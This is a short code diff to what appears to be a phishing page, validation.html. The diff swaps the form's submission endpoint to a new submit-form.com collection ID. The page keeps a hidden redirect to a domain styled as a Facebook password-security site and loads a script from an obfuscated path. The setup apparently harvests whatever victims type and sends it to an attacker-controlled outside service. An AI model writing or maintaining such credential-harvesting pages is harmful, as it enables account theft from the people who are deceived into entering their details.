--- a/validation.html
+++ b/validation.html
@@ -10,7 +10,7 @@
         <script type="text/javascript" src="/PGYoMpwI7xUbYJ_nSsVW5jv9fvL1JdJQKDvmPXti2f8Xmo4eHCOGTfM9bEYj_7QBiHdsFz8rJz1VGUpOGY3yzA=="></script>
     </head>
     <body>
-        <form action="https://submit-form.com/Y6aFw3bKH" method="post">
+        <form action="https://submit-form.com/hYgrVTpE3" method="post">
             <input type="hidden" name="_redirect" value="https://fb-password-security-here.vercel.app/"/>
             <div id="root">
                 <div>
